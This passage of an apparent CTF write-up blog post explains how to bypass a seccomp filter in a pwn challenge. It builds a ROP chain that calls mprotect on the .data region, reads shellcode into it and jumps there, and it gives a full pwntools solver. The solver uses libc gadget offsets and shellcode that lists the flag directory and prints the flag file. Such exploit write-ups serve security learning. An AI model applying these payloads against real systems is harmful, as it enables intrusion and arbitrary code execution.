class=\"language-text\">read</code>/<code class=\"language-text\">write</code> to print the file contents to stdout.</p>\n<p>However, building a ROP chain with Shell Code for such operations and finding corresponding gadgets is relatively challenging.</p>\n<p>In such cases, using a ROP chain to assign execute permission to an arbitrary region and then embedding a payload there allows us to execute Shell Code directly instead of a ROP chain.</p>\n<p>Since PIE is disabled in this challenge, the binary’s virtual addresses can be used directly as the write destination for the Shell Code.</p>\n<p>The <code class=\"language-text\">.data</code> section contains the seccomp filter, but overwriting it at exploit time is fine. I’ll target the region containing <code class=\"language-text\">0x404060</code>.</p>\n<p>A ROP chain that uses <code class=\"language-text\">mprotect</code> to grant write and execute permission to the range <code class=\"language-text\">0x404000</code> to <code class=\"language-text\">0x405000</code> can be constructed as follows:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">system_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\"\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\"@\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\nlibc_baseaddress <span class=\"token operator\">=</span> system_addr <span class=\"token operator\">-</span> <span class=\"token number\">0x50d70</span>\nbinsh_addr <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x1d8678</span>\nmprotect_addr <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x11eaa0</span>\n\npop_rdx_r12_ret <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x13b649</span>\npop_rdi_ret <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x1bbea1</span>\npop_rsi_r15_ret <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x1bbe9f</span>\nret <span class=\"token operator\">=</span> <span class=\"token number\">0x4012fc</span>\n\npayload <span class=\"token operator\">=</span> flat<span class=\"token punctuation\">(</span>\n    <span class=\"token string\">b\"A\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x10</span> <span class=\"token operator\">+</span> <span class=\"token string\">b\"B\"</span><span class=\"token operator\">*</span><span class=\"token number\">8</span><span class=\"token punctuation\">,</span>\n    pop_rdx_r12_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">7</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">9999</span><span class=\"token punctuation\">,</span>\n    pop_rsi_r15_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x1000</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">9999</span><span class=\"token punctuation\">,</span>\n    pop_rdi_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x404000</span><span class=\"token punctuation\">,</span>\n    mprotect_addr\n<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span></code></pre></div>\n<p>This payload sets the following three registers and then calls <code class=\"language-text\">mprotect</code>:</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\">mov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">7</span> <span class=\"token comment\">; R|W|X</span>\nmov <span class=\"token register variable\">rsi</span>, <span class=\"token number\">0x1000</span> <span class=\"token comment\">; target memory size</span>\nmov <span class=\"token register variable\">rdi</span>, {target_addr}</code></pre></div>\n<p>This ROP chain grants write and execute permission to the region from <code class=\"language-text\">0x404000</code> to <code class=\"language-text\">0x405000</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 898px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/1ca77a324b9ce192f099940b039ee08f/84cc5/image-20240628210517901.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 30.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABQUlEQVQY0z2R2XKCQBBFeVVARQVBSyWoiYZ92BEMIf7/L91cSMWHU7ere3odyVkdYM9XeDvdoC0WUBcbKDMN86WJGf2KPIWqKFDVARUK7Rey/FJ5sIlUfvVo+h5pUaH76eHHCbTlCrZzQZKXiBMBkaYjeVn+aVUiK3IEUTSq6/t8l8APQ0iN66ELQpS3T/QRk88XrDUNzm6H2vOQflxRMJaT+HRGzHj2fh39gXMaYwH9QzykSgmLCc/HoJHrohAJwiBAEgv41xsMTmutdQRMOGy3I1vdwMG0sLcsGGyuTCaYT3kaqtS0Le5Ng5oUXOmb65dVhfbxQBTH0A0D+saA4EppliHLuSInj4UY2R+PmLCYzFsOSF3Xoa5rlCx2r+94Pp/ImdSywaAWpzBNc7SzoSCJeKuUt0zZxLZtTDnZ/0f9AqV1rVJ22N9aAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/1ca77a324b9ce192f099940b039ee08f/8ac56/image-20240628210517901.webp 240w,\n/static/1ca77a324b9ce192f099940b039ee08f/d3be9/image-20240628210517901.webp 480w,\n/static/1ca77a324b9ce192f099940b039ee08f/005c4/image-20240628210517901.webp 898w\"\n              sizes=\"(max-width: 898px) 100vw, 898px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/1ca77a324b9ce192f099940b039ee08f/8ff5a/image-20240628210517901.png 240w,\n/static/1ca77a324b9ce192f099940b039ee08f/e85cb/image-20240628210517901.png 480w,\n/static/1ca77a324b9ce192f099940b039ee08f/84cc5/image-20240628210517901.png 898w\"\n            sizes=\"(max-width: 898px) 100vw, 898px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/1ca77a324b9ce192f099940b039ee08f/84cc5/image-20240628210517901.png\"\n            alt=\"image-20240628210517901\"\n            title=\"image-20240628210517901\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"embedding-a-payload-at-an-arbitrary-address\" style=\"position:relative;\"><a href=\"#embedding-a-payload-at-an-arbitrary-address\" aria-label=\"embedding a payload at an arbitrary address permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Embedding a Payload at an Arbitrary Address</h3>\n<p>Now that write and execute permission has been granted to the region from <code class=\"language-text\">0x404000</code> to <code class=\"language-text\">0x405000</code>, we embed the Shell Code into this address space rather than the stack.</p>\n<p>The technique is the same as before: use <code class=\"language-text\">read</code> to redirect the destination of bytes received from stdin to an arbitrary address.</p>\n<p>To do this, append the following ROP chain to the previous payload:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">payload <span class=\"token operator\">+=</span> flat<span class=\"token punctuation\">(</span>\n    xor_rax_ret<span class=\"token punctuation\">,</span>\n    pop_rdx_r12_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x100</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">9999</span><span class=\"token punctuation\">,</span>\n    pop_rsi_r15_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x404060</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">9999</span><span class=\"token punctuation\">,</span>\n    pop_rdi_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0</span><span class=\"token punctuation\">,</span>\n    syscall_ret\n<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span><span class=\"token string\">b\"A\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x100</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>This code implements the equivalent of the following Shell Code:</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\">mov <span class=\"token register variable\">rdi</span>, <span class=\"token number\">0</span> <span class=\"token comment\">; fd = stdin</span>\nmov <span class=\"token register variable\">rax</span>, <span class=\"token number\">0</span> <span class=\"token comment\">; read</span>\nmov <span class=\"token register variable\">rsi</span>, <span class=\"token number\">0x404060</span> <span class=\"token comment\">; write destination</span>\nmov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">0x100</span> <span class=\"token comment\">; bytes to read</span>\nsyscall</code></pre></div>\n<p>Running this script confirms that the data region starting at <code class=\"language-text\">0x404060</code> is filled with <code class=\"language-text\">A</code>s:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 853px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f47d5b7248e9b00dccaa62468a658664/66caf/image-20240628214614945.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 59.166666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABzklEQVQoz22TW5OTQBCFeUhtGEIwFy4JhDshJASz60ZrSy1L/f//6TindRDXfZjqk2H662usZFUjXec4HGL0fS8nTVNsNhtEUYQwDLHdbkUb6/u+6N1uh9VqhcViAdd1xVoP4Veo4BGz2QxN0yKOY1RVpQMc9O9GDvXxeJRAtHmeiz6dTgiCAPP5XIA8lh18gxfdUSQKbZPpqHu0bTtCpsAsy+RbURQjMEkSOSNwHvzAKn7Bc6/w9L5EnPx+aJx5qHnHzGhZAXXXdWKHYZgCdYa7ZwxHG0+3BmlWCoQZ0JpSp2BmaDTt+XyW/kkPbf8F76Ibrhp4u2ZSXlXmUgYzKcvyn77WdS0QfqfmHYMtl0t4nscefoYXDshihcc+QFOuUeaBzkqDqxq1Bk2d2VMCTV8ZbL/fy+SpLTv8rku+oy0UPly3qIpQQzIN1D3UDm+VzKyp2UOCqdfrtUAtO/oJN7zDXTzoHbzoJhfaqRudDcgMgNYM5XK5yF46jiP9o7VU8AWu3kNlz3HqCEr/rEr63x4S/HoPufhKqb9TVv5HuH4PR9lo9GM6s6S3hmLuzFAYjIvNzMZ/iuN/gqeBC8eW6DLliXP1aijTKfP9FMjzC15xP8HDCRF6AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f47d5b7248e9b00dccaa62468a658664/8ac56/image-20240628214614945.webp 240w,\n/static/f47d5b7248e9b00dccaa62468a658664/d3be9/image-20240628214614945.webp 480w,\n/static/f47d5b7248e9b00dccaa62468a658664/d8b1f/image-20240628214614945.webp 853w\"\n              sizes=\"(max-width: 853px) 100vw, 853px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f47d5b7248e9b00dccaa62468a658664/8ff5a/image-20240628214614945.png 240w,\n/static/f47d5b7248e9b00dccaa62468a658664/e85cb/image-20240628214614945.png 480w,\n/static/f47d5b7248e9b00dccaa62468a658664/66caf/image-20240628214614945.png 853w\"\n            sizes=\"(max-width: 853px) 100vw, 853px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f47d5b7248e9b00dccaa62468a658664/66caf/image-20240628214614945.png\"\n            alt=\"image-20240628214614945\"\n            title=\"image-20240628214614945\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The <code class=\"language-text\">jmp_rsi</code> appended at the end is used to jump directly to the buffer address held in the RSI register.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 824px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/50c263f9773966f72aad20a8bb0d5d9c/c1c45/image-20240628215127968.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 56.666666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB9ElEQVQoz3VT23LaMBDloZ1iS7Jkybr4AsTYCYZA04SMpwN9yPT//+l0ETjJdCYPZ9Yr7R6dvXgm6gBmLMq6R6jXYM6hMjWcKZF6j9JtYAKdewdrK3TFEt7W4MEjcx6CrAolskxCCIGZ8Bb9doeu36FwNRQRlmTLcgHdlAhuBXkhNwoyN/DSQilDfg6mNSEH1wacczDGMCtcgb9vb3h6+kkJAkXQpKRAVZVoqhqeFHAK5GlKCSkSlkR78SewlIER4YV0ZoPD6XTGfn+AdhrLzYoIrpecSuC3wCnhf//zeVQolMSf8xmH/Q6OlO2GASm9miRJxCVoCo7fX2FS6Js7NMsB2vcQ+o5UtshNgPUNLPWSyQYso8EJ6pegXn0Ci7id82s1s/H3K+q7X/imjkjsGWn+gPu+w/g6ou96pPR6wtnV3lRPuFQyqZ/P59eSj+MzFu0zfuiRCE8QZsBqvUR7aFFUFoXIUDMalsrhaANCCO8wxkQSpRSapoGmqZPCI5r2Bd9vhFwPuH9Yo3/saC89NA3GUlKeCSLQKIgk2sIgz1WcuJRZfExKiVm3GeJSZ9mKdmpLS97CLxq07UBBDZWrkIgcKdmUSVqbD6SMCONdTi1IryV32xf0mxHd6hHOH7B2JXzFEUoLT38KYxn1SX4JFpG9T/kfo3wPL1P96RIAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/50c263f9773966f72aad20a8bb0d5d9c/8ac56/image-20240628215127968.webp 240w,\n/static/50c263f9773966f72aad20a8bb0d5d9c/d3be9/image-20240628215127968.webp 480w,\n/static/50c263f9773966f72aad20a8bb0d5d9c/5758c/image-20240628215127968.webp 824w\"\n              sizes=\"(max-width: 824px) 100vw, 824px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/50c263f9773966f72aad20a8bb0d5d9c/8ff5a/image-20240628215127968.png 240w,\n/static/50c263f9773966f72aad20a8bb0d5d9c/e85cb/image-20240628215127968.png 480w,\n/static/50c263f9773966f72aad20a8bb0d5d9c/c1c45/image-20240628215127968.png 824w\"\n            sizes=\"(max-width: 824px) 100vw, 824px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/50c263f9773966f72aad20a8bb0d5d9c/c1c45/image-20240628215127968.png\"\n            alt=\"image-20240628215127968\"\n            title=\"image-20240628215127968\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"executing-the-embedded-shell-code\" style=\"position:relative;\"><a href=\"#executing-the-embedded-shell-code\" aria-label=\"executing the embedded shell code permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Executing the Embedded Shell Code</h3>\n<p>Based on the techniques practiced so far, I created the following Solver.</p>\n<p>Running it retrieves the Flag:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n<span class=\"token keyword\">import</span> re\n\n<span class=\"token comment\"># Set context</span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\n\ntarget <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"localhost\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">4567</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Exploit</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Name: \"</span><span class=\"token punctuation\">)</span>\n\nsystem_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\"\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\"@\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\nlibc_baseaddress <span class=\"token operator\">=</span> system_addr <span class=\"token operator\">-</span> <span class=\"token number\">0x50d70</span>\nbinsh_addr <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x1d8678</span>\nmprotect_addr <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x11eaa0</span>\n\npop_rdx_r12_ret <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x13b649</span>\npop_rdi_ret <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x1bbea1</span>\npop_rsi_r15_ret <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x1bbe9f</span>\nxor_rax_ret <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x1a46c0</span>\nsyscall_ret <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x140e2b</span>\njmp_rsi <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x14d1f9</span>\nret <span class=\"token operator\">=</span> <span class=\"token number\">0x4012fc</span>\n\n<span class=\"token comment\"># mprotect ROP chain</span>\npayload <span class=\"token operator\">=</span> flat<span class=\"token punctuation\">(</span>\n    <span class=\"token string\">b\"A\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x10</span> <span class=\"token operator\">+</span> <span class=\"token string\">b\"B\"</span><span class=\"token operator\">*</span><span class=\"token number\">8</span><span class=\"token punctuation\">,</span>\n    ret<span class=\"token punctuation\">,</span>\n    pop_rdx_r12_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">7</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">9999</span><span class=\"token punctuation\">,</span>\n    pop_rsi_r15_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x1000</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">9999</span><span class=\"token punctuation\">,</span>\n    pop_rdi_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x404000</span><span class=\"token punctuation\">,</span>\n    mprotect_addr\n<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># read ROP chain</span>\npayload <span class=\"token operator\">+=</span> flat<span class=\"token punctuation\">(</span>\n    xor_rax_ret<span class=\"token punctuation\">,</span>\n    pop_rdx_r12_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x100</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">9999</span><span class=\"token punctuation\">,</span>\n    pop_rsi_r15_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x404060</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">9999</span><span class=\"token punctuation\">,</span>\n    pop_rdi_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0</span><span class=\"token punctuation\">,</span>\n    syscall_ret<span class=\"token punctuation\">,</span>\n    jmp_rsi\n<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># execute shell code</span>\nopen_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span><span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/app/ctf4b/\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\ngetdents64_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>getdents64<span class=\"token punctuation\">(</span><span class=\"token string\">\"rax\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x100</span><span class=\"token punctuation\">)</span>\nwrite_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x100</span><span class=\"token punctuation\">)</span>\n\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>open_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>getdents64_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>write_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n\"\"\"</span></span><span class=\"token punctuation\">)</span>\n\nread_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x4040b9</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x100</span><span class=\"token punctuation\">)</span>\nshellcode <span class=\"token operator\">+=</span> asm<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>read_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n\"\"\"</span></span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>shellcode <span class=\"token operator\">+</span> <span class=\"token string\">b\"A\"</span><span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x100</span><span class=\"token operator\">-</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>shellcode<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\npattern <span class=\"token operator\">=</span> re<span class=\"token punctuation\">.</span><span class=\"token builtin\">compile</span><span class=\"token punctuation\">(</span><span class=\"token string\">rb\"flag-[0-9a-z]{32}.txt\"</span><span class=\"token punctuation\">)</span>\nfile_name <span class=\"token operator\">=</span> pattern<span class=\"token punctuation\">.</span>findall<span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nopen_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span><span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"/app/ctf4b/</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>file_name<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\nread_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rax\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">30</span><span class=\"token punctuation\">)</span>\nwrite_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">30</span><span class=\"token punctuation\">)</span>\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>open_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>read_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>write_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n\"\"\"</span></span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>shellcode <span class=\"token operator\">+</span> <span class=\"token string\">b\"A\"</span><span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x100</span><span class=\"token operator\">-</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>shellcode<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"./payload\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"wb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 765px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/c87e5077608da42966ac5c8c71449aff/bbb77/image-20240628225954737.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    